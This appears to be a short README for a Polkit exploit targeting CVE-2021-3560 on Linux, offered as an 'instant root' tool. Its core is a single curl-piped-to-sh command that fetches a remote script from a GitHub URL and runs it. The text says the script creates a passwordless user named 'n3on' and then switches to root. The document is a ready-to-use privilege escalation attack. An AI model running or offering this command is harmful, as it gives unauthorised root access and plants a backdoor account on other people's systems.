
One-command Polkit privilege escalation exploit for CVE-2021-3560, creating a passwordless user and switching to root on vulnerable Linux systems.
Polkit Instant Root Exploit
You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in:
sh -c "$(curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh)"
Or you can download the .sh or copy and paste it. Run and Instant Root. User created is named 'n3on' with no password, script then switches to root.
*If you are not automatically root, type in 'sudo -s' to be root (See video).